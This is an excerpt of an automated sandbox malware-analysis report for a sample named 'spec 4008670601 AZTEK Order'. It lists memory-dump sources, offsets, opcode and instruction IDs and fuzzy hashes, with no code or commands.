                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 553781f9e3777b9d7df6b43abb166319b638b741d56e4873c86bd862baada693
                                                      • Instruction ID: a67453d0f31deb9b07733d0b3fa26dedf8858e937ce5a606e2c002833f9e6a54
                                                      • Opcode Fuzzy Hash: 553781f9e3777b9d7df6b43abb166319b638b741d56e4873c86bd862baada693
                                                      • Instruction Fuzzy Hash: 47413874E092498FDB40CFA9D4816EEFBF6BF49300F149129E559E7641D7309A81CBE0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: cd9e25720b12892948d41826fc6e5f57dd2598a4e8738f6980ce837977b45d33
                                                      • Instruction ID: a5c4bb79e34ebdbfd5c510a72ec6993660e2c4f3b7ee2c0cb03610191768d384
                                                      • Opcode Fuzzy Hash: cd9e25720b12892948d41826fc6e5f57dd2598a4e8738f6980ce837977b45d33
                                                      • Instruction Fuzzy Hash: 3541E574D19219DFDB80CFA8E4848AEBBF4FB4D300B01A859E496A7355D7B0E950CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 516d265cc3358275471399166fc9b0db1ac5b9524e00e0ce0a43a88431fdfc48
                                                      • Instruction ID: 9325fc46f804f986526c98b46e645c8a53b611877c6b018c71e3ec68eea87dcc
                                                      • Opcode Fuzzy Hash: 516d265cc3358275471399166fc9b0db1ac5b9524e00e0ce0a43a88431fdfc48
                                                      • Instruction Fuzzy Hash: BF410574D19219DFDB80CFA8E4848AEBBF4FF4D310B01A859E496A7355D7B0E950CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c63a8c6b0ed5cd77af354f21a5e1c0fad65f068f207b016c61470b81b2e066e4
                                                      • Instruction ID: 0120bbe450b50c6328448c0a87889a4b88161fa532f5a750f13cbc23381a5321
                                                      • Opcode Fuzzy Hash: c63a8c6b0ed5cd77af354f21a5e1c0fad65f068f207b016c61470b81b2e066e4
                                                      • Instruction Fuzzy Hash: 7A419A74E1522DDFDB85CFA9E888AEDBBB2BB0A300F509425E816F7250DB349941CF54
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5a434f8dc86e5d93f6260526c1fb5dca8dcecbdf1b81f47b678daf4b0d3003a3
                                                      • Instruction ID: 708ddb759c7c632678a66343fc883ffc1375a6a0832abcc227bc27d68cd3523a
                                                      • Opcode Fuzzy Hash: 5a434f8dc86e5d93f6260526c1fb5dca8dcecbdf1b81f47b678daf4b0d3003a3
                                                      • Instruction Fuzzy Hash: B441F274D19219DFDB80CFA8E4888EDBBF0FF4D300B016859E496A7255DB70A950CB94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 00b1530e2ef9ec241ed61382ce68aacaa1f3db77e1aa47df8aa631718120dfa1
                                                      • Instruction ID: 0638c6764e43fafb00b18f772d1be7173f61b900a934f8c80d200fd4bfc72f14
                                                      • Opcode Fuzzy Hash: 00b1530e2ef9ec241ed61382ce68aacaa1f3db77e1aa47df8aa631718120dfa1
                                                      • Instruction Fuzzy Hash: 81319130B043514BEB9A7BBD486476F25D7DFC4690B14083EE907DB3D5DE288D0283AA
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6db67f306e544952e78fe0771b812892ba6e0a555e46cf6d75ea6a64529a0259
                                                      • Instruction ID: 605cb12de70bdf9b286f8ac02d305038a34f56b7cf68514e02c6449eb350c31e
                                                      • Opcode Fuzzy Hash: 6db67f306e544952e78fe0771b812892ba6e0a555e46cf6d75ea6a64529a0259
                                                      • Instruction Fuzzy Hash: 7F315A71904308AFDF50DFA9C884A9EBFF9EF48310F10852AE915E7210D774A950CFA4
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 131f2f71d7cc877a903489835c1540b23fdf6fb755fcebcbb19a9718456a7416
                                                      • Instruction ID: 20a41c3357d84436676e7a02f14e8448736954d55bb41ac00d4f3a6dbda90d5e
                                                      • Opcode Fuzzy Hash: 131f2f71d7cc877a903489835c1540b23fdf6fb755fcebcbb19a9718456a7416
                                                      • Instruction Fuzzy Hash: C1318235A002448FDB05DFA4C984AEE7BF2EF49304F5580A9E905EB366DB35ED05CB60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c910d9bd624fc791b233a50ced2097bba9783aaf6fdf5d4a9bac6073e48f6c63
                                                      • Instruction ID: 0651bb8478ad8b579828a94982def818e85ff37a4024a69d4a6ea5a55fde2e1b
                                                      • Opcode Fuzzy Hash: c910d9bd624fc791b233a50ced2097bba9783aaf6fdf5d4a9bac6073e48f6c63
                                                      • Instruction Fuzzy Hash: 1C31EA74D08248CFDB48CFAAC8456AEBFF6BF89300F14902AD419AB355DB709946CF80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d35ced08e02c9d56563907af0dcaddb1d49eecb667a8e9e99d50e0d328f28c70
                                                      • Instruction ID: 91137f25e4d0acd786161046d9b137bdd2a4d9b647d4412fec79d24e9c4346ad
                                                      • Opcode Fuzzy Hash: d35ced08e02c9d56563907af0dcaddb1d49eecb667a8e9e99d50e0d328f28c70
                                                      • Instruction Fuzzy Hash: 0B212572604240EFDB05DF14E9C0B2ABFA5FB98318F30C5A9E9090B256C336D856CAA1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d1f27b6fa0e45e1450b09d087d3e12c2069b572192e88643982f07635b702523
                                                      • Instruction ID: 5f710ad8dd12ab2c76847df161016f996d169a0056e833ff34014f6189ba73b2
                                                      • Opcode Fuzzy Hash: d1f27b6fa0e45e1450b09d087d3e12c2069b572192e88643982f07635b702523
                                                      • Instruction Fuzzy Hash: D4219D756007159FC310CF69C8809ABBBF9FF89700B00856EE919DB350E770A945CBA0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f36dd097dc8556f62af8dd625f4727332f7fbf8d6340cf00f769c2a47b0760d2
                                                      • Instruction ID: 3dbb0500af7c71671df8f985f6fea8f3b05a347d40a944a10165042349d26bfe
                                                      • Opcode Fuzzy Hash: f36dd097dc8556f62af8dd625f4727332f7fbf8d6340cf00f769c2a47b0760d2
                                                      • Instruction Fuzzy Hash: 36212675604304EFDB05DF14D9C0B26BBE5FB84314F20C6ADE9094B392C7B6D946DA61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 810d6376ed37728839454622fdd178f94e4a158bd428ab1505d8296d36123cba
                                                      • Instruction ID: 2484b151d8c9fea01349deaf94ea43ce9f232346cad44816df03bdb8b7b93d21
                                                      • Opcode Fuzzy Hash: 810d6376ed37728839454622fdd178f94e4a158bd428ab1505d8296d36123cba
                                                      • Instruction Fuzzy Hash: 79213175604300EFCB14DF24D9D0B26BBA1FB88314F20C5ADE90A4B392C37AD907DA61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f224a398ba4b8f490a3a4583f00c11812e51bf5a5b9592f56d66416d4f9f29fc
                                                      • Instruction ID: df97677099bbbc7d0976f8ddbdac6a39a271736a666a14d3a112a1c271d02cda
                                                      • Opcode Fuzzy Hash: f224a398ba4b8f490a3a4583f00c11812e51bf5a5b9592f56d66416d4f9f29fc
                                                      • Instruction Fuzzy Hash: E531E0B0C04348DFEB60DF99C588B9EBFF4EB48714F24805AE405BB250C7B99845CB94
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49acdb34bfb78ab2dfe398e0b54782411bc602de0956a92234ccd03d308d9931
                                                      • Instruction ID: 7b9717100c7ab23feac8f8f293a9a54b1a9be2a6c4783d187c15ddc05ef947e3
                                                      • Opcode Fuzzy Hash: 49acdb34bfb78ab2dfe398e0b54782411bc602de0956a92234ccd03d308d9931
                                                      • Instruction Fuzzy Hash: 28216A756007159BC324CF69C8809BBBBFAFF89700B00896DE9199B310E770ED45C7A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 66ffe080fef57862acef2c60b62be61561feae7cda55ddd2ac6f970667f466e4
                                                      • Instruction ID: 8c7287194f1528bd7b9d8636236da23897981777727a7b45422d8f67b2cb4a62
                                                      • Opcode Fuzzy Hash: 66ffe080fef57862acef2c60b62be61561feae7cda55ddd2ac6f970667f466e4
                                                      • Instruction Fuzzy Hash: B121C0B1C01358DFDB60DF99C588B8EBFF4EB48714F24805AE409BB250D7B99845CB95
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c9d9616498f36ba39eb0450921001d9adc37d3d6ce19a2a124e5ae466200c656
                                                      • Instruction ID: d2e4724d389998b4dbaa34733fc257156bdb60020c65aa7969cef6977f61e26d
                                                      • Opcode Fuzzy Hash: c9d9616498f36ba39eb0450921001d9adc37d3d6ce19a2a124e5ae466200c656
                                                      • Instruction Fuzzy Hash: 492192755083809FCB02CF14D994B11BFB1EB46314F28C5DAD8498F2A7C33AD906CB62
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ec4007ac33a43822a7e340de8b6c853e7080530020536e31f5907f5e8cb7744d
                                                      • Instruction ID: 27ad86cf1556f878a201e0833aa3c97304ff4fb41d0381d6b44072e8be62dd16
                                                      • Opcode Fuzzy Hash: ec4007ac33a43822a7e340de8b6c853e7080530020536e31f5907f5e8cb7744d
                                                      • Instruction Fuzzy Hash: 2711CEB5A093849FDB85CFB48E9962E7FB4DB81201B2444EAA905C7291E930CE0487A1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 62acea30ae7a1608cd46971dfc77224abdb8a218956a93873522f0734b105959
                                                      • Instruction ID: 244441fd6cef7e571b6fa0aa38335ac126fb2b18a73ab4f316a8b3e7b2dde2f8
                                                      • Opcode Fuzzy Hash: 62acea30ae7a1608cd46971dfc77224abdb8a218956a93873522f0734b105959
                                                      • Instruction Fuzzy Hash: C621B474A10908DFC744DF5AE688999BBF1FF8C300B6280D5E448AB366DB71EE60DB04
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114559947.0000000000B4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B4D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b4d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                      • Instruction ID: 35d468255cf25249038d6d84bc2ba755dc11add48e2f0bf02d7592ddb4ece5f2
                                                      • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                      • Instruction Fuzzy Hash: E911BB75504280DFCB01CF10C5C4B15BBA1FB84314F24C6A9D8494B2A6C37AD80ACB61
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 444c4acb9675ea1c63ae2d4346c019f6a9f51fc5c474d9600f45e1238dcfc6f1
                                                      • Instruction ID: 683b34de5b8e597b018096233c0bc0d3ad2e87b01504708a48a0884fdf1e996d
                                                      • Opcode Fuzzy Hash: 444c4acb9675ea1c63ae2d4346c019f6a9f51fc5c474d9600f45e1238dcfc6f1
                                                      • Instruction Fuzzy Hash: AB11B2B1D106188BEB18CFABC8457DEFAF6AFC8300F04C16AD40966264DB7409458F90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 0e89a33c6e021f9940f1fbd5796128000e304945b4c153facbee804026284ce0
                                                      • Instruction ID: 0ff84b4384c70f574d7648227879e9b4324e134a1af96e674296051f6da0ac12
                                                      • Opcode Fuzzy Hash: 0e89a33c6e021f9940f1fbd5796128000e304945b4c153facbee804026284ce0
                                                      • Instruction Fuzzy Hash: BA11F774D09208DFDB84DFA9C5409AEBBF9FF89310F10959A945AA7316D770DA42CF80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bd02ded3a9b3319f511ded6ccf3148c03a769a698621e19f1ae77caf47f4dd50
                                                      • Instruction ID: 6898d868c829189f2016304913a78df76e01ac566e05563410ed9af050a995b3
                                                      • Opcode Fuzzy Hash: bd02ded3a9b3319f511ded6ccf3148c03a769a698621e19f1ae77caf47f4dd50
                                                      • Instruction Fuzzy Hash: F4018C30B49344CFE3498B29C815B163BB1AF86300F5981D6E6158F2B2CA61DC01CB01
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8e3a200524dab27373b0f0c7e1206b5c4e3873c953ab8cb61f819cf794ecfa5f
                                                      • Instruction ID: 5cadd976d820e1b636bde3788572bde9d4645314512da68855a28032f0091456
                                                      • Opcode Fuzzy Hash: 8e3a200524dab27373b0f0c7e1206b5c4e3873c953ab8cb61f819cf794ecfa5f
                                                      • Instruction Fuzzy Hash: 6A11B771E14218DFDB48CFAAD8459ADBBB6BF89301F00C16AE859A7355DB709901CF90
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2114499997.0000000000B3D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B3D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_b3d000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8fe42175ffd3827ea9528d550fdc417a9c1d7e1d69dc7280fbaec66db0403ec1
                                                      • Instruction ID: 7f2614aa8564889dff125c89e6d31a53ad8206280e280b9191ace332afa6642a
                                                      • Opcode Fuzzy Hash: 8fe42175ffd3827ea9528d550fdc417a9c1d7e1d69dc7280fbaec66db0403ec1
                                                      • Instruction Fuzzy Hash: 1C01D6B1504344DAE7104B26EDC4B67FFD8EF41724F38C59AED095A296CBB99C40C6B1
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 9b76ac455b5881d052c28cd5950d35e1cef383cca36535f322b701f530d92d67
                                                      • Instruction ID: 466df45a3aba33f28182dfd791639e3a975eb998902751bc35e0455799ee2502
                                                      • Opcode Fuzzy Hash: 9b76ac455b5881d052c28cd5950d35e1cef383cca36535f322b701f530d92d67
                                                      • Instruction Fuzzy Hash: 0701D431610208CBCB188B35E40849ABFB7FFC8325B04457EE50683391DF71A815CB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1e6de80083c60c9ff12bfe4d541f8b7527b415880d4d14e12040b51128b20f9e
                                                      • Instruction ID: 7f1f216fbe51f8761fb53f8258a2a0dabe1bf166042a90c36a871b4f7c470208
                                                      • Opcode Fuzzy Hash: 1e6de80083c60c9ff12bfe4d541f8b7527b415880d4d14e12040b51128b20f9e
                                                      • Instruction Fuzzy Hash: 3801BC71704501DFC7419A78AA182597AD3EFC9346F0565A9E20AC7299DBB4E8428781
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5c2600a8528817727c6d104f96cfc42fe2e49a593b188e8fb588062feb771c80
                                                      • Instruction ID: 9139b703b67b3fc3e84c5dd4a9fa651c2afc8b6ea1f326995db935329450a808
                                                      • Opcode Fuzzy Hash: 5c2600a8528817727c6d104f96cfc42fe2e49a593b188e8fb588062feb771c80
                                                      • Instruction Fuzzy Hash: 0FF0E935B08304235AF56B1A8D88A7F669DDFD44A0B180439FD2AC3340EF14DC4291F5
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 58b1a3451f69fdf3cc88c6f9d357738be829733cf45298e192a9259a325538f3
                                                      • Instruction ID: df9f91f2a0370e9bd9d952f36673362c7094a9701e2e9d271a0158468838f5e1
                                                      • Opcode Fuzzy Hash: 58b1a3451f69fdf3cc88c6f9d357738be829733cf45298e192a9259a325538f3
                                                      • Instruction Fuzzy Hash: 6B01FF30304500CFC7549A38E91865A7BE7EBC9356B0161B9F20AC7356CFB0EC428781
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 39ff719dc3ea7b105ece7e8092c52fd8a311d8179808295f369a559faa8ca31b
                                                      • Instruction ID: 2f6a70966f36175713100632448036df88ffb5d63c1117172ff5f7c28ba1c55b
                                                      • Opcode Fuzzy Hash: 39ff719dc3ea7b105ece7e8092c52fd8a311d8179808295f369a559faa8ca31b
                                                      • Instruction Fuzzy Hash: 56F046B2704B514BC7288B3F9C0466BBFEBEBC9295F09C53FD145C3210DAB0C5028690
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 636e47ebfaadd292be2b9434e4e37b924a66ab0916eb03c1c252571a14642229
                                                      • Instruction ID: 82b8f9f42310136c144739c75607bb0e97c0efd0867fe9d295c6b68a90a639cc
                                                      • Opcode Fuzzy Hash: 636e47ebfaadd292be2b9434e4e37b924a66ab0916eb03c1c252571a14642229
                                                      • Instruction Fuzzy Hash: 5FF0B477B041186F9344DA6ADC84E67BBEEEBC86617158179F508C7305DA319C01C7A0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 25f6c13540faab32a4807e781cfff1cad361ad77b1e45781528e2fe979f451ea
                                                      • Instruction ID: e110cba5516484a1eb16f62c0ec516b3b65cc1f368f4171b6cc396406166e533
                                                      • Opcode Fuzzy Hash: 25f6c13540faab32a4807e781cfff1cad361ad77b1e45781528e2fe979f451ea
                                                      • Instruction Fuzzy Hash: D201FB34A08208EFD744DFA9C659A6DBBF6AF48300F25C094E5099B766D730DE01DB80
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2fccc0f7cefaad2b9d2ffa7edd53dcf2fcdc90507bab399f2a74dec805d36558
                                                      • Instruction ID: 84baa13e0cd6aa6643170c44065dd48ae9a2d7790f524b57183732f37412eb09
                                                      • Opcode Fuzzy Hash: 2fccc0f7cefaad2b9d2ffa7edd53dcf2fcdc90507bab399f2a74dec805d36558
                                                      • Instruction Fuzzy Hash: 51F0AF7090D308DFE744CF66D400ABDBBBAAF89301F00A2A5D0495B616C770CA42DB98
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6f7e1a419e3f5a4720bc697740535ded7be06a4e1b6633988f9432a04294d1d0
                                                      • Instruction ID: 20a6708de8f3538ae00b4bdc4930ccfda6177c8b8c86e85e585faae8c22362c3
                                                      • Opcode Fuzzy Hash: 6f7e1a419e3f5a4720bc697740535ded7be06a4e1b6633988f9432a04294d1d0
                                                      • Instruction Fuzzy Hash: 05014870C04359DFDB51CF65C4043AEBAB1EF49360F298129E424AB290D774CA44CBD0
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130852787.0000000006DA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_6da0000_spec 4008670601 AZTEK Order.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
